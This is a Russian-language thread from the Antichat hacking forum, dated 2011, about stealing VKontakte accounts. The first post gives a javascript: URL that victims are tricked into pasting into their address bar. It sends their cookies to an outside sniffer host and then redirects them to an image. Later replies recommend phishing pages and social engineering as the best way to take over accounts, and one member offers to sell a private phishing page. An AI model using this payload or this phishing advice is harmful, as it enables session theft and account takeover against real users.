HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2011, 01:00
rushx
Новичок
Регистрация: 28.11.2011
Сообщений: 12
С нами: 7608566

Репутация: 0
По умолчанию

вообщем придумал способ как можно грамотно жертве впарить ссылку прямо в адресную строку. только проблема в том что куки не приходят, или у жертвы ссылка не открывается (говорят просто белая страница)
ссылку пишу вот эту javascript:document.write('img = new Image(); img.src = "http://httpz.ru/n8brbzadzlt.gif?"+document.cookie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);')

причем когда я по ней перехожу, то у меня все нормально и в сниффере мой вход отображается, и куки лежат
 
Ответить с цитированием

  #2  
Старый 29.11.2011, 01:00
Kzooz
Участник форума
Регистрация: 12.02.2011
Сообщений: 271
С нами: 8024726

Репутация: 6
По умолчанию

Тебе cookies ничего не дадут. Они уже давно привязаны к ip адресу.
 
Ответить с цитированием

  #3  
Старый 30.11.2011, 01:00
Yorvet
Флудер
Регистрация: 19.08.2011
Сообщений: 2,281
С нами: 7754006

Репутация: 115


По умолчанию

Вот сейчас некоторые товарищи побегут помощи ради проверять код, вставляя его в адресную строку. Действительно, нашёл способ грамотно впарить ссылку напрямую
А вообще, куки контакта с недавнего времени уже нет смысла воровать. Гораздо полезнее использовать снифер.
 
Ответить с цитированием

  #4  
Старый 30.11.2011, 01:00
rushx
Новичок
Регистрация: 28.11.2011
Сообщений: 12
С нами: 7608566

Репутация: 0
По умолчанию

объясните пожалуйста по-подробнее. разве сниффер используется не для того что бы воровать куки?
а к ip кукисы привязаны вообще везде или на самом контакте?

зы: если сниффер для взлома контакта не вариант, скажите тогда пожалуйста самый актуальный способ на сегодня... погуглю( только не си)
 
Ответить с цитированием

  #5  
Старый 30.11.2011, 01:00
Yorvet
Флудер
Регистрация: 19.08.2011
Сообщений: 2,281
С нами: 7754006

Репутация: 115


По умолчанию

Снифер это способ получения данных от пользователя. Кроме кукисов он может передавать и другую информацию, например данные об IP, браузере, системе, дате перехода по ссылке, откуда был совершён переход, а так же любую введённую после определённой команды информацию (как это делает скрипт для фейков).

По поводу привязки не знаю. Во всяком случае, для взлома контакта лучше использовать фейки. Это и есть самый актуальный способ и на сегодня, и на вчера, и на завтра. А СИ в той или иной мере используется в любом способе взлома, без неё никуда.
 
Ответить с цитированием

  #6  
Старый 30.11.2011, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию

По поводу привязки не знаю. Во всяком случае, для взлома контакта лучше использовать фейки. Это и есть самый актуальный способ и на сегодня, и на вчера, и на завтра. А СИ в той или иной мере используется в любом способе взлома, без неё никуда.
Да, качественный фейк - самый рациональный и актуальный способ увода аккаунта вконтакте. Либо может еще есть дорогущие приватные способы взлома вконтакте. Кстати, если нужен качественный приватный фейк вконтакте с валидацией логина-пароля, обращайтесь в личку, продам незадорого.
 
Ответить с цитированием

  #7  
Старый 30.11.2011, 01:00
Yorvet
Флудер
Регистрация: 19.08.2011
Сообщений: 2,281
С нами: 7754006

Репутация: 115


По умолчанию

Или здесь по соседству есть темка с фейком для контакта, который работает по сей день (имеющие мОзги да исправят ), только без валидации.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.